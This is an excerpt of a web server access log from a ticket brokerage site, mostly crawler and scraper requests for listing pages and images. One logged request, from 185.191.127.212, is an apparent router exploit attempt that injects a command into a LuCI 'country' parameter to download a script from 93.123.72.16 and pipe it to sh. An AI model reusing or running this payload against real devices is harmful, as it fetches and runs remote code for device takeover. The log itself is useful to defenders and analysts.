135.181.213.220 - - [30/Jun/2024:00:10:48 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4F1601FE-364B-5738-B6A1-896D7AAC5D9B&sortorder=desc&column=section HTTP/1.1" 200 87753
135.181.213.220 - - [30/Jun/2024:00:10:52 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4F1B6DF5-628F-F25D-981B-BD9489467C6D&sortorder=asc&column=price HTTP/1.1" 200 88602
216.245.221.83 - - [30/Jun/2024:00:10:53 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
135.181.213.220 - - [30/Jun/2024:00:10:55 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4F1B6DF5-628F-F25D-981B-BD9489467C6D&sortorder=asc&column=row HTTP/1.1" 200 88602
216.245.221.83 - - [30/Jun/2024:00:10:56 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
52.167.144.224 - - [30/Jun/2024:00:10:56 +0200] "GET /ticket2/opencms/en/venue/?venueid=E0AACC64-AFF5-5004-2F13-64A84D0E8D40 HTTP/1.1" 200 71399
135.181.213.220 - - [30/Jun/2024:00:10:58 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4F1B6DF5-628F-F25D-981B-BD9489467C6D&sortorder=asc&column=section HTTP/1.1" 200 88602
185.191.127.212 - - [30/Jun/2024:00:11:00 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560wget+http%253A%252F%252F93.123.72.16%252Ft+-O-+%7c+sh%2560) HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:11:02 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4F2A6EFC-5A42-DA27-F945-B53203FE129B&sortorder=asc&column=row HTTP/1.1" 200 87762
94.23.203.202 - - [30/Jun/2024:00:11:04 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=88C381AD-5D76-A34D-AC15-A7129F8EF5BE HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:11:05 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4F2A6EFC-5A42-DA27-F945-B53203FE129B&sortorder=asc&column=section HTTP/1.1" 200 87762
47.128.34.194 - - [30/Jun/2024:00:11:08 +0200] "GET /ticket2/opencms/fi/buy/?catid=F7F89B9B-6697-7881-54AE-4C39276BF1B8&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&page=7 HTTP/1.1" 200 78395
135.181.213.220 - - [30/Jun/2024:00:11:09 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4F2CF2F7-766D-C068-1DF7-D79FFA6A3FFF HTTP/1.1" 200 89104
47.128.34.194 - - [30/Jun/2024:00:11:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.34.194 - - [30/Jun/2024:00:11:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.34.194 - - [30/Jun/2024:00:11:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.34.194 - - [30/Jun/2024:00:11:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.34.194 - - [30/Jun/2024:00:11:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.34.194 - - [30/Jun/2024:00:11:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.34.194 - - [30/Jun/2024:00:11:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
135.181.213.220 - - [30/Jun/2024:00:11:12 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4F679D59-A856-14F0-ECEF-29CBD5EE9427&sortorder=desc&column=row HTTP/1.1" 200 87495
135.181.213.220 - - [30/Jun/2024:00:11:15 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4F679D59-A856-14F0-ECEF-29CBD5EE9427&sortorder=desc&column=section HTTP/1.1" 200 87495
135.181.213.220 - - [30/Jun/2024:00:11:19 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=50C0FE40-B971-378E-B393-EFCC781A0E84 HTTP/1.1" 200 89112
75.119.148.39 - - [30/Jun/2024:00:11:20 +0200] "GET /ticket2/opencms/sv/login/?edid=FAE946FB-8095-E5DE-5553-68545CD77F0B HTTP/1.1" 200 74250
135.181.213.220 - - [30/Jun/2024:00:11:22 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5160EF60-35C4-C5A3-CB79-9915EF9DD088 HTTP/1.1" 200 88645
94.23.203.202 - - [30/Jun/2024:00:11:23 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=8AA488FA-6797-D710-8108-3088D6948FC1 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:11:25 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=516D2084-D01E-11D1-0C8F-230D7B392DCC HTTP/1.1" 200 89021
135.181.213.220 - - [30/Jun/2024:00:11:29 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=51B97722-D202-5F9B-2404-47133D11E51D&sortorder=asc&column=row HTTP/1.1" 200 89119
135.181.213.220 - - [30/Jun/2024:00:11:32 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=51B97722-D202-5F9B-2404-47133D11E51D&sortorder=desc&column=row HTTP/1.1" 200 89118
135.181.213.220 - - [30/Jun/2024:00:11:35 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=51CE4D50-7536-6D99-0472-A1F5831352C9&sortorder=asc&column=price HTTP/1.1" 200 87532
94.23.203.202 - - [30/Jun/2024:00:11:36 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=97608B80-50C4-18AE-7A82-0413C62E9243 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:11:38 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=51CE4D50-7536-6D99-0472-A1F5831352C9&sortorder=asc&column=row HTTP/1.1" 200 87532
135.181.213.220 - - [30/Jun/2024:00:11:42 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=51CE4D50-7536-6D99-0472-A1F5831352C9&sortorder=asc&column=section HTTP/1.1" 200 87532
135.181.213.220 - - [30/Jun/2024:00:11:45 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=52E9C51D-192F-C954-8F05-403EF150A75E HTTP/1.1" 200 89113
66.249.76.8 - - [30/Jun/2024:00:11:47 +0200] "GET /ticket2/opencms/fi/venue/?countryid=431EFD4E-08D9-96D2-1220-D823702A8178 HTTP/1.1" 200 102292
66.249.66.67 - - [30/Jun/2024:00:11:47 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/la_liga/real_madrid/ HTTP/1.1" 200 75993
66.249.66.32 - - [30/Jun/2024:00:11:48 +0200] "GET /ticket2/opencms/de/magazine/article?title=arsenal-und-tottenham-teilen-sich-in-einem-epischen-4-4-match-am-29-oktober-2008 HTTP/1.1" 200 75348
135.181.213.220 - - [30/Jun/2024:00:11:49 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=53295BAC-18AC-7C4A-B0D4-A319E386EA83 HTTP/1.1" 200 89102
94.23.203.202 - - [30/Jun/2024:00:11:49 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A3372871-3019-08B8-80CE-74B78F441ACA HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:11:52 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=536A1E51-556D-8EFA-3895-7913FC522E05&sortorder=asc&column=price HTTP/1.1" 200 89117
135.181.213.220 - - [30/Jun/2024:00:11:55 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=536A1E51-556D-8EFA-3895-7913FC522E05&sortorder=asc&column=row HTTP/1.1" 200 89117
135.181.213.220 - - [30/Jun/2024:00:11:59 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=536A1E51-556D-8EFA-3895-7913FC522E05&sortorder=asc&column=section HTTP/1.1" 200 89117
47.128.34.217 - - [30/Jun/2024:00:12:01 +0200] "GET /ticket2/opencms/no/buy/?catid=0A9E385E-33D9-328E-DC79-CA2C7009C829&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=7 HTTP/1.1" 200 83080
135.181.213.220 - - [30/Jun/2024:00:12:02 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=543D9F4F-FAE8-D606-2F86-FDCC2C711D5A&sortorder=asc&column=section HTTP/1.1" 200 88615
47.128.34.217 - - [30/Jun/2024:00:12:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.34.217 - - [30/Jun/2024:00:12:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.34.217 - - [30/Jun/2024:00:12:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.34.217 - - [30/Jun/2024:00:12:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.34.217 - - [30/Jun/2024:00:12:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.34.217 - - [30/Jun/2024:00:12:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.34.217 - - [30/Jun/2024:00:12:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
94.23.203.202 - - [30/Jun/2024:00:12:03 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A4D9EA9A-192D-0274-BF26-9C98D8B902AB HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:12:06 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=546E931E-314A-79BF-BE54-CF16A69C5B15 HTTP/1.1" 200 87469
135.181.213.220 - - [30/Jun/2024:00:12:09 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5479A2BE-D2B1-73D0-27F5-2C328C470E50&sortorder=asc&column=row HTTP/1.1" 200 88614
135.181.213.220 - - [30/Jun/2024:00:12:12 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5479A2BE-D2B1-73D0-27F5-2C328C470E50&sortorder=asc&column=section HTTP/1.1" 200 88614
216.245.221.83 - - [30/Jun/2024:00:12:13 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [30/Jun/2024:00:12:14 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
135.181.213.220 - - [30/Jun/2024:00:12:15 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=54BF7B38-1191-4855-07DB-8DE87C08BACB HTTP/1.1" 200 88640
135.181.213.220 - - [30/Jun/2024:00:12:19 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5588B8CD-BB26-BC2D-8DA2-0851F243FD51&sortorder=asc&column=price HTTP/1.1" 200 85991
94.23.203.202 - - [30/Jun/2024:00:12:22 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=A7674DEA-B39E-502C-2F76-760AE08947E9 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:12:22 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=55AE14A0-00CF-8E29-D1CC-F8CDD1E23137&sortorder=asc&column=price HTTP/1.1" 200 87557
135.181.213.220 - - [30/Jun/2024:00:12:25 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=55AE14A0-00CF-8E29-D1CC-F8CDD1E23137&sortorder=asc&column=row HTTP/1.1" 200 87557
135.181.213.220 - - [30/Jun/2024:00:12:29 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=55AE14A0-00CF-8E29-D1CC-F8CDD1E23137&sortorder=asc&column=section HTTP/1.1" 200 87557
135.181.213.220 - - [30/Jun/2024:00:12:32 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5630DE9E-B2AA-33B3-91FB-95B3177F4375&sortorder=asc&column=row HTTP/1.1" 200 88829
135.181.213.220 - - [30/Jun/2024:00:12:35 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=563FCA46-03ED-44D1-2A64-D153F80207C9&sortorder=asc&column=price HTTP/1.1" 200 89105
94.23.203.202 - - [30/Jun/2024:00:12:39 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=AE3FE643-AE41-BAA6-237D-5206D1B044A1 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:12:39 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5DC5F4BB-E0CD-B313-C354-E3A2601E78F2&sortorder=asc&column=row HTTP/1.1" 200 87578
135.181.213.220 - - [30/Jun/2024:00:12:42 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5E44F4FF-203D-4B11-88AE-65BFB1964492&sortorder=asc&column=price HTTP/1.1" 200 87755
114.119.140.79 - - [30/Jun/2024:00:12:43 +0200] "GET /ticket2/opencms/en/sell/?edid=5F78C39B-4186-FE18-0E0D-7E9A9CDFF515 HTTP/1.1" 302 -
135.181.213.220 - - [30/Jun/2024:00:12:46 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5E44F4FF-203D-4B11-88AE-65BFB1964492&sortorder=asc&column=row HTTP/1.1" 200 87755
185.191.171.16 - - [30/Jun/2024:00:12:46 +0200] "GET /ticket2/opencms/de/sport/fussball-tickets/bundesliga/freiburg/ HTTP/1.1" 200 76522
114.119.140.79 - - [30/Jun/2024:00:12:46 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 73431
135.181.213.220 - - [30/Jun/2024:00:12:49 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5E44F4FF-203D-4B11-88AE-65BFB1964492&sortorder=asc&column=section HTTP/1.1" 200 87755
94.23.203.202 - - [30/Jun/2024:00:12:51 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=B0817F4C-4B6F-A68C-6229-209BB05F84D4 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:12:52 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5E9AF950-B6C9-F1E1-A899-5C14154503B5&sortorder=asc&column=price HTTP/1.1" 200 88612
47.128.44.155 - - [30/Jun/2024:00:12:54 +0200] "GET /ticket2/opencms/no/buy/?catid=F7FF413B-5FDF-82CF-E5BB-CD4AB6027974&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&page=7 HTTP/1.1" 200 78019
47.128.44.155 - - [30/Jun/2024:00:12:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.44.155 - - [30/Jun/2024:00:12:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
135.181.213.220 - - [30/Jun/2024:00:12:56 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5E9AF950-B6C9-F1E1-A899-5C14154503B5&sortorder=asc&column=row HTTP/1.1" 200 88612
47.128.44.155 - - [30/Jun/2024:00:12:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.44.155 - - [30/Jun/2024:00:12:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.44.155 - - [30/Jun/2024:00:12:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.44.155 - - [30/Jun/2024:00:12:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.44.155 - - [30/Jun/2024:00:12:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
135.181.213.220 - - [30/Jun/2024:00:12:59 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5E9AF950-B6C9-F1E1-A899-5C14154503B5&sortorder=asc&column=section HTTP/1.1" 200 88612
135.181.213.220 - - [30/Jun/2024:00:13:02 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5EBD2CAF-0480-558F-38B0-42EFEC65C121&sortorder=asc&column=price HTTP/1.1" 200 88617
94.23.203.202 - - [30/Jun/2024:00:13:03 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=BDD8C04C-DD99-1C07-B5F3-F2AB98D157E8 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:13:06 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5EBD2CAF-0480-558F-38B0-42EFEC65C121&sortorder=asc&column=row HTTP/1.1" 200 88617
135.181.213.220 - - [30/Jun/2024:00:13:09 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5EBD2CAF-0480-558F-38B0-42EFEC65C121&sortorder=asc&column=section HTTP/1.1" 200 88617
135.181.213.220 - - [30/Jun/2024:00:13:12 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5F546AA7-3EBF-7ACB-76FE-ACC19CFACFC1&sortorder=asc&column=price HTTP/1.1" 200 87752
135.181.213.220 - - [30/Jun/2024:00:13:16 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5F546AA7-3EBF-7ACB-76FE-ACC19CFACFC1&sortorder=asc&column=section HTTP/1.1" 200 87752
66.249.66.45 - - [30/Jun/2024:00:13:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
135.181.213.220 - - [30/Jun/2024:00:13:19 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5F56230C-1D50-AA08-B627-595D000E7ED7&sortorder=asc&column=price HTTP/1.1" 200 87953
94.23.203.202 - - [30/Jun/2024:00:13:21 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=BE041FBE-C1A7-918C-EB61-99ED02D12F5B HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:13:22 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5F56230C-1D50-AA08-B627-595D000E7ED7&sortorder=asc&column=row HTTP/1.1" 200 87953
135.181.213.220 - - [30/Jun/2024:00:13:26 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5F737A44-E043-889A-3C4C-656072CFE9D8&sortorder=asc&column=price HTTP/1.1" 200 88393
135.181.213.220 - - [30/Jun/2024:00:13:29 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5F737A44-E043-889A-3C4C-656072CFE9D8&sortorder=asc&column=row HTTP/1.1" 200 88393
94.23.203.202 - - [30/Jun/2024:00:13:32 +0200] "GET /ticket2/opencms/de/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=C0DF818C-DB21-6E2E-4056-DB751FFE0C41 HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:13:33 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5F737A44-E043-889A-3C4C-656072CFE9D8&sortorder=asc&column=section HTTP/1.1" 200 88393
47.128.58.145 - - [30/Jun/2024:00:13:33 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=EE88A278-4246-5F52-B464-8A4E30AD7F5A HTTP/1.1" 200 87882
47.128.58.145 - - [30/Jun/2024:00:13:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.58.145 - - [30/Jun/2024:00:13:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/two_man.png HTTP/1.1" 200 3407
47.128.58.145 - - [30/Jun/2024:00:13:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.58.145 - - [30/Jun/2024:00:13:35 +0200] "GET /ticket2/opencms/venue/Tottanham_Hotspur_Stadium.png HTTP/1.1" 200 43726
47.128.58.145 - - [30/Jun/2024:00:13:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.58.145 - - [30/Jun/2024:00:13:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.58.145 - - [30/Jun/2024:00:13:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.58.145 - - [30/Jun/2024:00:13:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.58.145 - - [30/Jun/2024:00:13:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.58.145 - - [30/Jun/2024:00:13:36 +0200] "GET /ticket2/opencms/en/ask-form.html HTTP/1.1" 200 3146
135.181.213.220 - - [30/Jun/2024:00:13:36 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5FE0BB7A-24EB-156D-2665-FBDB998F0062&sortorder=asc&column=price HTTP/1.1" 200 89304
135.181.213.220 - - [30/Jun/2024:00:13:39 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=6082F16E-936D-95FC-7956-A001C0E49E14 HTTP/1.1" 200 89108
135.181.213.220 - - [30/Jun/2024:00:13:43 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=60A92E2C-5D4D-C143-3776-D1790FE7FB3F HTTP/1.1" 200 89108
47.128.121.209 - - [30/Jun/2024:00:13:46 +0200] "GET /ticket2/opencms/no/buy/?catid=2DE12DDA-A5FB-C1C6-CB20-FBF873FB032B&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=7 HTTP/1.1" 200 83092
135.181.213.220 - - [30/Jun/2024:00:13:46 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=61E71578-689B-B247-38A0-8B93EBFFC4CC&sortorder=asc&column=price HTTP/1.1" 200 87545
47.128.121.209 - - [30/Jun/2024:00:13:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
47.128.121.209 - - [30/Jun/2024:00:13:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.121.209 - - [30/Jun/2024:00:13:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.121.209 - - [30/Jun/2024:00:13:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.121.209 - - [30/Jun/2024:00:13:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.121.209 - - [30/Jun/2024:00:13:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.121.209 - - [30/Jun/2024:00:13:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.121.209 - - [30/Jun/2024:00:13:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
94.23.203.202 - - [30/Jun/2024:00:13:49 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=9105DCA9-DA89-4D98-8EC3-D0773C34A12F HTTP/1.1" 404 -
135.181.213.220 - - [30/Jun/2024:00:13:50 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=61E71578-689B-B247-38A0-8B93EBFFC4CC&sortorder=asc&column=row HTTP/1.1" 200 87545
135.181.213.220 - - [30/Jun/2024:00:13:53 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=61E71578-689B-B247-38A0-8B93EBFFC4CC&sortorder=asc&column=section HTTP/1.1" 200 87545
135.181.213.220 - - [30/Jun/2024:00:13:56 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=6302A151-C828-89AF-7E9A-36E32F9794F6&sortorder=asc&column=price HTTP/1.1" 200 85999
47.128.44.127 - - [30/Jun/2024:00:13:58 +0200] "GET /ticket2/opencms/no/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=7 HTTP/1.1" 200 242316
47.128.44.127 - - [30/Jun/2024:00:13:59 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
135.181.213.220 - - [30/Jun/2024:00:13:59 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=6302A151-C828-89AF-7E9A-36E32F9794F6&sortorder=asc&column=row HTTP/1.1" 200 85999
47.128.44.127 - - [30/Jun/2024:00:14:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
94.23.203.202 - - [30/Jun/2024:00:14:00 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=9106BE2A-595F-088E-C676-3C2DCBD74D16 HTTP/1.1" 404 -
47.128.44.127 - - [30/Jun/2024:00:14:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.44.127 - - [30/Jun/2024:00:14:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.44.127 - - [30/Jun/2024:00:14:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.44.127 - - [30/Jun/2024:00:14:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.44.127 - - [30/Jun/2024:00:14:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
75.119.148.39 - - [30/Jun/2024:00:14:10 +0200] "GET /ticket2/opencms/sv/login/?edid=FBA63F82-513F-DB56-1EBF-6C49F4510CEA HTTP/1.1" 200 74250
94.23.203.202 - - [30/Jun/2024:00:14:11 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=9113985D-44E1-D6AA-8893-307E961DB223 HTTP/1.1" 404 -
47.128.38.175 - - [30/Jun/2024:00:14:23 +0200] "GET /ticket2/opencms/fi/venue/?countryid=A95940B8-9D24-555E-8502-7702CF57B799 HTTP/1.1" 200 102292
47.128.38.175 - - [30/Jun/2024:00:14:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.38.175 - - [30/Jun/2024:00:14:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
